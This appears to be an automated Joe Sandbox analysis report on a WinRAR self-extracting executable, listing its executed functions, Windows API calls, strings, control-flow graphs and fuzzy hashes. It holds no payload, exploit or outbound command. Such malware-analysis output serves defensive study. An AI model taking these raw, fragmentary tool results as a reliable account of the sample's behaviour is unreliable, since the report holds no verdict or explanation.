ebba3c 25160 ebb7bb 25135->25160 25138 ebba53 25138->25128 25139 eb8e06 __vswprintf_c_l 21 API calls 25140 ebba64 25139->25140 25150 ebba96 25140->25150 25167 ebbbf0 25140->25167 25143 eb8dcc _free 20 API calls 25143->25138 25144 ebba91 25177 eb91a8 20 API calls __dosmaperr 25144->25177 25145 ebbaae 25147 ebbada 25145->25147 25148 eb8dcc _free 20 API calls 25145->25148 25147->25150 25178 ebb691 26 API calls 25147->25178 25148->25147 25150->25143 25152 ebbb5a __FrameHandler3::FrameUnwindToState 25151->25152 25153 eb97e5 _abort 38 API calls 25152->25153 25158 ebbb64 25153->25158 25155 ebbbe8 _abort 25155->25135 25158->25155 25159 eb8dcc _free 20 API calls 25158->25159 25179 eb8d24 38 API calls _abort 25158->25179 25180 ebac31 EnterCriticalSection 25158->25180 25181 ebbbdf LeaveCriticalSection _abort 25158->25181 25159->25158 25161 eb4636 __fassign 38 API calls 25160->25161 25162 ebb7cd 25161->25162 25163 ebb7ee 25162->25163 25164 ebb7dc GetOEMCP 25162->25164 25165 ebb805 25163->25165 25166 ebb7f3 GetACP 25163->25166 25164->25165 25165->25138 25165->25139 25166->25165 25168 ebb7bb 40 API calls 25167->25168 25169 ebbc0f 25168->25169 25172 ebbc60 IsValidCodePage 25169->25172 25174 ebbc16 25169->25174 25176 ebbc85 _abort 25169->25176 25170 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25171 ebba89 25170->25171 25171->25144 25171->25145 25173 ebbc72 GetCPInfo 25172->25173 25172->25174 25173->25174 25173->25176 25174->25170 25182 ebb893 GetCPInfo 25176->25182 25177->25150 25178->25150 25180->25158 25181->25158 25183 ebb977 25182->25183 25184 ebb8cd 25182->25184 25187 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25183->25187 25192 ebc988 25184->25192 25189 ebba23 25187->25189 25189->25174 25191 ebab78 __vswprintf_c_l 43 API calls 25191->25183 25193 eb4636 __fassign 38 API calls 25192->25193 25194 ebc9a8 MultiByteToWideChar 25193->25194 25196 ebca7e 25194->25196 25197 ebc9e6 25194->25197 25198 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25196->25198 25199 ebca07 _abort __vsnwprintf_l 25197->25199 25200 eb8e06 __vswprintf_c_l 21 API calls 25197->25200 25201 ebb92e 25198->25201 25202 ebca78 25199->25202 25204 ebca4c MultiByteToWideChar 25199->25204 25200->25199 25206 ebab78 25201->25206 25211 ebabc3 20 API calls _free 25202->25211 25204->25202 25205 ebca68 GetStringTypeW 25204->25205 25205->25202 25207 eb4636 __fassign 38 API calls 25206->25207 25208 ebab8b 25207->25208 25212 eba95b 25208->25212 25211->25196 25213 eba976 __vswprintf_c_l 25212->25213 25214 eba99c MultiByteToWideChar 25213->25214 25215 eba9c6 25214->25215 25226 ebab50 25214->25226 25216 eba9e7 __vsnwprintf_l 25215->25216 25220 eb8e06 __vswprintf_c_l 21 API calls 25215->25220 25219 ebaa30 MultiByteToWideChar 25216->25219 25222 ebaa9c 25216->25222 25217 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25218 ebab63 25217->25218 25218->25191 25221 ebaa49 25219->25221 25219->25222 25220->25216 25239 ebaf6c 25221->25239 25248 ebabc3 20 API calls _free 25222->25248 25226->25217 25227 ebaaab 25229 eb8e06 __vswprintf_c_l 21 API calls 25227->25229 25233 ebaacc __vsnwprintf_l 25227->25233 25228 ebaa73 25228->25222 25231 ebaf6c __vswprintf_c_l 11 API calls 25228->25231 25229->25233 25230 ebab41 25247 ebabc3 20 API calls _free 25230->25247 25231->25222 25233->25230 25234 ebaf6c __vswprintf_c_l 11 API calls 25233->25234 25235 ebab20 25234->25235 25235->25230 25236 ebab2f WideCharToMultiByte 25235->25236 25236->25230 25237 ebab6f 25236->25237 25249 ebabc3 20 API calls _free 25237->25249 25240 ebac98 _abort 5 API calls 25239->25240 25241 ebaf93 25240->25241 25244 ebaf9c 25241->25244 25250 ebaff4 10 API calls 3 library calls 25241->25250 25243 ebafdc LCMapStringW 25243->25244 25245 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25244->25245 25246 ebaa60 25245->25246 25246->25222 25246->25227 25246->25228 25247->25222 25248->25226 25249->25222 25250->25243 25294 ebc030 GetProcessHeap 25295 eaa400 GdipDisposeImage GdipFree 25339 ead600 70 API calls 25296 eb6000 QueryPerformanceFrequency QueryPerformanceCounter 25322 eb2900 6 API calls 4 library calls 25340 ebf200 51 API calls 25361 eba700 21 API calls 25363 e91710 86 API calls 25324 eaad10 73 API calls

                                                                                                                        Executed Functions

                                                                                                                        Function 00EADF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195filesleeptimeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EA0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00EA087C
                                                                                                                          • Part of subcall function 00EA0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00EA088E
                                                                                                                          • Part of subcall function 00EA0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00EA08BF
                                                                                                                          • Part of subcall function 00EAA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00EAA655
                                                                                                                          • Part of subcall function 00EAAC16: OleInitialize.OLE32(00000000), ref: 00EAAC2F
                                                                                                                          • Part of subcall function 00EAAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00EAAC66
                                                                                                                          • Part of subcall function 00EAAC16: SHGetMalloc.SHELL32(00ED8438), ref: 00EAAC70
                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00EADF5C
                                                                                                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00EADF83
                                                                                                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00EADF94
                                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00EADFCE
                                                                                                                          • Part of subcall function 00EADBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00EADBF4
                                                                                                                          • Part of subcall function 00EADBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00EADC30
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EADFD7
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,00EEEC90,00000800), ref: 00EADFF2
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxname,00EEEC90), ref: 00EADFFE
                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 00EAE009
                                                                                                                        • _swprintf.LIBCMT ref: 00EAE048
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00EAE05A
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00EAE061
                                                                                                                        • LoadIconW.USER32(00000000,00000064), ref: 00EAE078
                                                                                                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00EAE0C9
                                                                                                                        • Sleep.KERNEL32(?), ref: 00EAE0F7
                                                                                                                        • DeleteObject.GDI32 ref: 00EAE130
                                                                                                                        • DeleteObject.GDI32(?), ref: 00EAE140
                                                                                                                        • CloseHandle.KERNEL32 ref: 00EAE183
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz
                                                                                                                        • API String ID: 3049964643-271953491
                                                                                                                        • Opcode ID: dcc7abda744af4a4c5c6ec764165200e287081b0a2b67f12c4dd1f8764171891
                                                                                                                        • Instruction ID: 86c34149c2d4913030fa896d93de7de665401f9c293b9e419b02f8bac4a0e058
                                                                                                                        • Opcode Fuzzy Hash: dcc7abda744af4a4c5c6ec764165200e287081b0a2b67f12c4dd1f8764171891
                                                                                                                        • Instruction Fuzzy Hash: 64613B71505344AFD320AB76EC89F6B77ECEB4E304F04142AF446BA291DB74A94CC761
                                                                                                                        Function 00EAA6C2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 100memorywindowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 802 eaa6c2-eaa6df FindResourceW 803 eaa7db 802->803 804 eaa6e5-eaa6f6 SizeofResource 802->804 805 eaa7dd-eaa7e1 803->805 804->803 806 eaa6fc-eaa70b LoadResource 804->806 806->803 807 eaa711-eaa71c LockResource 806->807 807->803 808 eaa722-eaa737 GlobalAlloc 807->808 809 eaa73d-eaa746 GlobalLock 808->809 810 eaa7d3-eaa7d9 808->810 811 eaa7cc-eaa7cd GlobalFree 809->811 812 eaa74c-eaa76a call eb0320 809->812 810->805 811->810 816 eaa76c-eaa78e call eaa626 812->816 817 eaa7c5-eaa7c6 GlobalUnlock 812->817 816->817 822 eaa790-eaa798 816->822 817->811 823 eaa79a-eaa7ae GdipCreateHBITMAPFromBitmap 822->823 824 eaa7b3-eaa7c1 822->824 823->824 825 eaa7b0 823->825 824->817 825->824
                                                                                                                        APIs
                                                                                                                        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00EAB73D,00000066), ref: 00EAA6D5
                                                                                                                        • SizeofResource.KERNEL32(00000000,?,?,?,00EAB73D,00000066), ref: 00EAA6EC
                                                                                                                        • LoadResource.KERNEL32(00000000,?,?,?,00EAB73D,00000066), ref: 00EAA703
                                                                                                                        • LockResource.KERNEL32(00000000,?,?,?,00EAB73D,00000066), ref: 00EAA712
                                                                                                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00EAB73D,00000066), ref: 00EAA72D
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00EAA73E
                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00EAA762
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EAA7C6
                                                                                                                          • Part of subcall function 00EAA626: GdipAlloc.GDIPLUS(00000010), ref: 00EAA62C
                                                                                                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00EAA7A7
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00EAA7CD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                        • String ID: Fjun$PNG
                                                                                                                        • API String ID: 211097158-1136719808
                                                                                                                        • Opcode ID: c55a331b62d2a0165217ef707bb06917a2c9b331978d4a24ac1985a036837a80
                                                                                                                        • Instruction ID: 055c81351f98a266f44b975c1ee45a6c65cefe538c0c1971774dcc03e06f39ce
                                                                                                                        • Opcode Fuzzy Hash: c55a331b62d2a0165217ef707bb06917a2c9b331978d4a24ac1985a036837a80
                                                                                                                        • Instruction Fuzzy Hash: E731D771601301AFD7119F32EC48D1BBFB8EF89754B08553AF805B6220DB32EC49CA51
                                                                                                                        Function 00E9A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1032 e9a69b-e9a6bf call eaec50 1035 e9a6c1-e9a6ce FindFirstFileW 1032->1035 1036 e9a727-e9a730 FindNextFileW 1032->1036 1037 e9a742-e9a7ff call ea0602 call e9c310 call ea15da * 3 1035->1037 1039 e9a6d0-e9a6e2 call e9bb03 1035->1039 1036->1037 1038 e9a732-e9a740 GetLastError 1036->1038 1043 e9a804-e9a811 1037->1043 1040 e9a719-e9a722 1038->1040 1047 e9a6fe-e9a707 GetLastError 1039->1047 1048 e9a6e4-e9a6fc FindFirstFileW 1039->1048 1040->1043 1050 e9a709-e9a70c 1047->1050 1051 e9a717 1047->1051 1048->1037 1048->1047 1050->1051 1052 e9a70e-e9a711 1050->1052 1051->1040 1052->1051 1054 e9a713-e9a715 1052->1054 1054->1040
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00E9A592,000000FF,?,?), ref: 00E9A6C4
                                                                                                                          • Part of subcall function 00E9BB03: _wcslen.LIBCMT ref: 00E9BB27
                                                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00E9A592,000000FF,?,?), ref: 00E9A6F2
                                                                                                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00E9A592,000000FF,?,?), ref: 00E9A6FE
                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,?,?,?,00E9A592,000000FF,?,?), ref: 00E9A728
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00E9A592,000000FF,?,?), ref: 00E9A734
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 42610566-0
                                                                                                                        • Opcode ID: 4f017790035b84a3fd138b08b97a32cfd47ab0518a40ded9a6a319d16354c2ce
                                                                                                                        • Instruction ID: 3cd78dd62d70597cff76066ac81a4f610cd80ac02d69b8129661981cd14e8292
                                                                                                                        • Opcode Fuzzy Hash: 4f017790035b84a3fd138b08b97a32cfd47ab0518a40ded9a6a319d16354c2ce
                                                                                                                        • Instruction Fuzzy Hash: E4418F72900515ABCB25DF64CC89AEAB7B9FF48350F1441A6E96DF3240D734AE94CF90
                                                                                                                        Function 00EB7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,00EB7DC4,00000000,00ECC300,0000000C,00EB7F1B,00000000,00000002,00000000), ref: 00EB7E0F
                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00EB7DC4,00000000,00ECC300,0000000C,00EB7F1B,00000000,00000002,00000000), ref: 00EB7E16
                                                                                                                        • ExitProcess.KERNEL32 ref: 00EB7E28
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1703294689-0
                                                                                                                        • Opcode ID: 164f74a01a201edebc399d926b0a645e3062ad6b62ae7b9db3ee10d4f61da7ec
                                                                                                                        • Instruction ID: 59073ca2db2a386d23882ea111c7b61f392ed1b6a359dac4b2a22bfff5fbdd65
                                                                                                                        • Opcode Fuzzy Hash: 164f74a01a201edebc399d926b0a645e3062ad6b62ae7b9db3ee10d4f61da7ec
                                                                                                                        • Instruction Fuzzy Hash: 03E04F31000144EFCF017F22CD0AD8A3F6AEF40341B008468F955AA532CB36DE56CB80
                                                                                                                        Function 00E9848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: 779523d3617f3df752646d0d9b47bc527d29595313c38bb9140c4106f8059bbe
                                                                                                                        • Instruction ID: 7d69768c9177769c9ea2333a64b20a2abbecb35eb9b8a6c343394c1ba61bbfab
                                                                                                                        • Opcode Fuzzy Hash: 779523d3617f3df752646d0d9b47bc527d29595313c38bb9140c4106f8059bbe
                                                                                                                        • Instruction Fuzzy Hash: CA822E70904245AEDF15DF64C991BFAB7B9BF06304F0861BAD849BB263DB315A88C760
                                                                                                                        Function 00EAB7E0 Relevance: 109.2, APIs: 48, Strings: 14, Instructions: 731windowfilesleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00EAB7E5
                                                                                                                          • Part of subcall function 00E91316: GetDlgItem.USER32(00000000,00003021), ref: 00E9135A
                                                                                                                          • Part of subcall function 00E91316: SetWindowTextW.USER32(00000000,00EC35F4), ref: 00E91370
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00EAB8D1
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EAB8EF
                                                                                                                        • IsDialogMessageW.USER32(?,?), ref: 00EAB902
                                                                                                                        • TranslateMessage.USER32(?), ref: 00EAB910
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00EAB91A
                                                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00EAB93D
                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00EAB960
                                                                                                                        • GetDlgItem.USER32(?,00000068), ref: 00EAB983
                                                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00EAB99E
                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,00EC35F4), ref: 00EAB9B1
                                                                                                                          • Part of subcall function 00EAD453: _wcschr.LIBVCRUNTIME ref: 00EAD45C
                                                                                                                          • Part of subcall function 00EAD453: _wcslen.LIBCMT ref: 00EAD47D
                                                                                                                        • SetFocus.USER32(00000000), ref: 00EAB9B8
                                                                                                                        • _swprintf.LIBCMT ref: 00EABA24
                                                                                                                          • Part of subcall function 00E94092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E940A5
                                                                                                                          • Part of subcall function 00EAD4D4: GetDlgItem.USER32(00000068,00EEFCB8), ref: 00EAD4E8
                                                                                                                          • Part of subcall function 00EAD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00EAAF07,00000001,?,?,00EAB7B9,00EC506C,00EEFCB8,00EEFCB8,00001000,00000000,00000000), ref: 00EAD510
                                                                                                                          • Part of subcall function 00EAD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00EAD51B
                                                                                                                          • Part of subcall function 00EAD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00EC35F4), ref: 00EAD529
                                                                                                                          • Part of subcall function 00EAD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00EAD53F
                                                                                                                          • Part of subcall function 00EAD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00EAD559
                                                                                                                          • Part of subcall function 00EAD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00EAD59D
                                                                                                                          • Part of subcall function 00EAD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00EAD5AB
                                                                                                                          • Part of subcall function 00EAD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00EAD5BA
                                                                                                                          • Part of subcall function 00EAD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00EAD5E1
                                                                                                                          • Part of subcall function 00EAD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00EC43F4), ref: 00EAD5F0
                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00EABA68
                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00EABA90
                                                                                                                        • GetTickCount.KERNEL32 ref: 00EABAAE
                                                                                                                        • _swprintf.LIBCMT ref: 00EABAC2
                                                                                                                        • GetLastError.KERNEL32(?,00000011), ref: 00EABAF4
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00EABB43
                                                                                                                        • _swprintf.LIBCMT ref: 00EABB7C
                                                                                                                        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00EABBD0
                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00EABBEA
                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00EABC47
                                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00EABC6F
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00EABCB9
                                                                                                                        • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00EABCE2
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EABCEB
                                                                                                                        • _swprintf.LIBCMT ref: 00EABD1E
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00EABD7D
                                                                                                                        • SetDlgItemTextW.USER32(?,00000065,00EC35F4), ref: 00EABD94
                                                                                                                        • GetDlgItem.USER32(?,00000065), ref: 00EABD9D
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00EABDAC
                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00EABDBB
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00EABE68
                                                                                                                        • _wcslen.LIBCMT ref: 00EABEBE
                                                                                                                        • _swprintf.LIBCMT ref: 00EABEE8
                                                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 00EABF32
                                                                                                                        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00EABF4C
                                                                                                                        • GetDlgItem.USER32(?,00000068), ref: 00EABF55
                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00EABF6B
                                                                                                                        • GetDlgItem.USER32(?,00000066), ref: 00EABF85
                                                                                                                        • SetWindowTextW.USER32(00000000,00EDA472), ref: 00EABFA7
                                                                                                                        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00EAC007
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00EAC01A
                                                                                                                        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00EAC0BD
                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00EAC197
                                                                                                                        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00EAC1D9
                                                                                                                          • Part of subcall function 00EAC73F: __EH_prolog.LIBCMT ref: 00EAC744
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00EAC1FD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                                                        • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<$STARTDLG$^$__tmp_rar_sfx_access_check_%u$h$winrarsfxmappingfile.tmp$Q
                                                                                                                        • API String ID: 3829768659-4153176784
                                                                                                                        • Opcode ID: 1c77b8a8d3995fd5af95dd8aea6b63540be0cb4d49c25fdad2489a207f961eb5
                                                                                                                        • Instruction ID: e8a53717f1d3bd7a15909d4cf249f6c1160f4eaf99407aa64177d852a9c1cd87
                                                                                                                        • Opcode Fuzzy Hash: 1c77b8a8d3995fd5af95dd8aea6b63540be0cb4d49c25fdad2489a207f961eb5
